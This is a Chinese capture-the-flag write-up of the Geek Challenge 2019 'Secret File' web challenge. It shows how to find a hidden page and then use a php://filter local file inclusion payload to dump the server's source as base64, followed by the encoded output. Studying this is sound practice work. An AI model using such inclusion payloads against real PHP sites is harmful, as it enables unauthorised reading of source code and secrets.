【极客大挑战 2019】Secret File

解题过程：

1、首先按下F12，再网页源码中找到下一目标地址；

 

 

 

 

 2、按下secret键，发现网页跳转后显示

 

 

 于是打开Burp Suite，通过劫持网页请求与返回，发现隐藏目标

 

 

3、到达secr3t.php后，阅读php文件。

 

 php://filter是一种元封装器， 设计用于数据流打开时的筛选过滤应用。
- include “test.php” php文件包含，在执行流中插入写在其他文件中的有用的代码。读取的时候也是数据流形式，因此可以使用php://filter进行过滤，返回值为0,1。
- readfile(“test.php”)是将文件以数据流的形式读取过来，并不会执行，但会在前台浏览器上进行解析。返回值是字节数多少。

 

于是可以通过以下url获取密文：

 9e742ddb-d35a-4ebc-a062-3f1d01de03a3.node3.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=index.php

 

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyIgPgojbWFzdGVyIHsKICAgIHBvc2l0aW9uOmFic29sd

XRlOwogICAgbGVmdDo0NCU7CiAgICBib3R0b206MDsKICAgIHRleHQtYWxpZ24gOmNlbnRlcjsKICAgICAgICB9CiAgICAgICAgcCxoMSB

7CiAgICAgICAgICAgICAgICBjdXJzb3I6IGRlZmF1bHQ7CiAgICAgICAgfQo8L3N0eWxlPgoKICAgICAgICA8aGVhZD4KICAgICAgICAgICAgI

CAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgICAgICAgICAgICAgIDx0aXRsZT7okovnkpDmupDnmoTnp5jlr4Y8L3RpdGxlPgogICAgICAg

IDwvaGVhZD4KCiAgICAgICAgPGJvZHkgc3R5bGU9ImJhY2tncm91bmQtY29sb3I6YmxhY2s7Ij48YnI+PGJyPjxicj48YnI+PGJyPjxicj4KCiAg

ICAgICAgICAgIDxoMSBzdHlsZT0iZm9udC1mYW1pbHk6dmVyZGFuYTtjb2xvcjpyZWQ7dGV4dC1hbGlnbjpjZW50ZXI7Ij7kvaDmg7Pnn6Xpg

ZPokovnkpDmupDnmoTnp5jlr4bkuYjvvJ88L2gxPjxicj48YnI+PGJyPgoKICAgICAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWF

sO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPuaDs+imgeeahOivneWPr+S7pee7meS9oO+8jOWOu+aJv

uWQp++8geaKiuS4gOWIh+mDveaUvuWcqOmCo+mHjOS6hu+8gTwvcD4KICAgICAgICAgICAgPGEgaWQ9Im1hc3RlciIgaHJlZj0iLi9BcmNo

aXZlX3Jvb20ucGhwIiBzdHlsZT0iYmFja2dyb3VuZC1jb2xvcjojMDAwMDAwO2hlaWdodDo3MHB4O3dpZHRoOjIwMHB4O2NvbG9yOmJsYW

NrO2xlZnQ6NDQlO2N1cnNvcjpkZWZhdWx0OyI+T2ghIFlvdSBmb3VuZCBtZTwvYT4KICAgICAgICAgICAgPGRpdiBzdHlsZT0icG9zaXRpb24

6IGFic29sdXRlO2JvdHRvbTogMDt3aWR0aDogOTklOyI+PHAgYWxpZ249ImNlbnRlciIgc3R5bGU9ImZvbnQ6aXRhbGljIDE1cHggR2Vvcmdp

YSxzZXJpZjtjb2xvcjp3aGl0ZTsiPiBTeWNsb3ZlciBAIGNsNHk8L3A+PC9kaXY+CiAgICAgICAgPC9ib2R5Pgo8L2h0bWw+Cg== 

通过解密得到flag。